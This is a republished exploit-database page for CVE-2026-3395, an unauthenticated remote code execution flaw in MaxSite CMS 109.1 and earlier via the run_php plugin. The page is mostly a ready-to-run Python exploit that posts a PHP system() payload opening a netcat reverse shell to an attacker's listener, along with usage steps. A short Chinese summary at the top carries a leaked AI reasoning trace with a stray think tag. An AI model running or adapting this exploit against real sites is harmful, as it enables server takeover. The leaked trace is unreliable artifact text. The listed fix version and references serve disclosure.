MaxSite CMS < = 109.1 unauthenticated RCE via run_php plugin
好的,我现在需要帮用户总结一下这篇文章的内容。用户的要求是用中文,控制在一百个字以内,不需要特定的开头,直接写描述即可。 首先,我看看文章的内容。这是一篇关于MaxSite CMS漏洞的Exploit代码和说明。文章提到了CVE-2026-3395,影响版本是109.1及以下,通过run_php插件实现未认证的远程代码执行。攻击者可以利用preview-ajax.php中的eval函数来执行任意代码,进而获取控制权。 接下来,我需要提取关键信息:漏洞名称、影响范围、攻击方式、利用条件、修复版本以及CVSS评分。这些都是用户可能关心的重点。 然后,我要把这些信息浓缩到100字以内。要确保涵盖所有重要点:漏洞名称、软件名称、影响版本、攻击方式(未认证RCE)、利用插件(run_php)、CVSS评分(9.8)以及修复版本(109.2)。 最后,组织语言,确保简洁明了。例如:“MaxSite CMS 109.1及以下版本因run_php插件存在未认证远程代码执行漏洞(CVE-2026-3395),攻击者可利用preview-ajax.php中的eval函数执行任意代码,CVSS评分9.8,已修复于109.2版本。” 检查一下字数是否在限制内,并确保没有遗漏关键信息。 </think> MaxSite CMS 109.1及以下版本因run_php插件存在未认证远程代码执行漏洞(CVE-2026-3395),攻击者可利用preview-ajax.php中的eval函数执行任意代码,CVSS评分9.8,已修复于109.2版本。 2026-3-2 21:12:44 Author: cxsecurity.com(查看原文) 阅读量:2 收藏

#!/usr/bin/env python3 # Exploit Title: MaxSite CMS <= 109.1 unauthenticated RCE via run_php plugin # CVE: CVE-2026-3395 # Date: 2026-03-01 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/mbanyamer # Vendor Homepage: https://max-3000.com/ # Software Link: https://github.com/maxsite/cms # Affected: MaxSite CMS <= 109.1 with run_php plugin enabled # Tested on: MaxSite CMS 109.1 # Category: Webapps # Platform: PHP # Exploit Type: Remote Code Execution # CVSS: 9.8 (Critical) # CWE: CWE-95 (Improper Neutralization of Directives in Dynamically Evaluated Code) # Description: Unauthenticated RCE in preview-ajax.php through eval() in run_php plugin # Fixed in: MaxSite CMS 109.2 (commit 08937a3c5d672a242d68f53e9fccf8a748820ef3) # Usage: python3 exploit.py <target> --lhost <your_ip> --lport <your_port> # # Examples: # python3 exploit.py http://target.com --lhost 192.168.1.100 --lport 4444 # # Options: # --lhost Listener IP for reverse shell # --lport Listener port # # Notes: # Requires run_php plugin to be enabled (common default) # Bypasses weak referrer check # # How to Use # Step 1: Start a listener (e.g. nc -lvnp 4444) # Step 2: Run the exploit print(r""" ╔════════════════════════════════════════════════════════════════════════════════════════════╗ ║ ║ ║ ▄▄▄▄· ▄▄▄ . ▄▄ • ▄▄▄▄▄ ▄▄▄ ▄▄▄· ▄▄▄· ▄▄▄▄▄▄▄▄▄ .▄▄▄ ▄• ▄▌ ║ ║ ▐█ ▀█▪▀▄.▀·▐█ ▀ ▪•██ ▪ ▀▄ █·▐█ ▀█ ▐█ ▄█•██ ▀▀▄.▀·▀▄ █·█▪██▌ ║ ║ ▐█▀▀█▄▐▀▀▪▄▄█ ▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ ▄█▀▀█ ██▀· ▐█.▪▐▀▀▪▄▐▀▀▄ █▌▐█· ║ ║ ██▄▪▐█▐█▄▄▌▐█▄▪▐█ ▐█▌·▐█▌.▐▌▐█•█▌▐█ ▪▐▌▐█▪·• ▐█▌·▐█▄▄▌▐█•█▌▐█▄█▌ ║ ║ ·▀▀▀▀ ▀▀▀ ·▀▀▀▀ ▀▀▀ ▀█▄▀▪.▀ ▀ ▀ ▀ .▀ ▀▀▀ ▀▀▀ .▀ ▀ ▀▀▀ ║ ║ ║ ║ b a n y a m e r _ s e c u r i t y ║ ║ ║ ║ >>> Silent Hunter • Shadow Presence <<< ║ ║ ║ ║ Operator : Mohammed Idrees Banyamer Jordan 🇯🇴 ║ ║ Handle : @banyamer_security ║ ║ ║ ║ CVE-2026-3395 • MaxSite CMS RCE via run_php ║ ║ ║ ╚════════════════════════════════════════════════════════════════════════════════════════════╝ """) import requests import base64 import argparse import sys def main(): parser = argparse.ArgumentParser(description="CVE-2026-3395 - MaxSite CMS unauthenticated RCE") parser.add_argument("target", help="Target URL (e.g. http://target.com)") parser.add_argument("--lhost", required=True, help="Listener IP for reverse shell") parser.add_argument("--lport", required=True, help="Listener port") args = parser.parse_args() target = args.target.rstrip("/") lhost = args.lhost lport = args.lport b64_path = base64.b64encode(b"admin/plugins/editor_markitup/preview-ajax.php").decode() url = f"{target}/ajax/{b64_path}" revshell = f"rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost} {lport} >/tmp/f" payload = f"[php]system('{revshell}');[/php]" headers = {"Referer": target} data = {"data": payload} print(f"[*] Sending payload to: {url}") print(f"[*] Reverse shell → {lhost}:{lport}") try: r = requests.post(url, data=data, headers=headers, timeout=12) if r.status_code == 200: print("[+] Request sent successfully") print("[+] Check your listener for connection") else: print(f"[-] Unexpected status code: {r.status_code}") print(f"Response: {r.text[:300]}...") except Exception as e: print(f"[-] Error: {str(e)}") if __name__ == "__main__": main()

References:

-

https://github.com/maxsite/cms/commit/08937a3c5d672a242d68f53e9fccf8a748820ef3

-

https://vuldb.com/?id.348281

-

https://vuldb.com/?ctiid.348281

-

https://vuldb.com/?submit.762169

-

https://nvd.nist.gov/vuln/detail/CVE-2026-3395




 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2026030005
如有侵权请联系:admin#unsafe.sh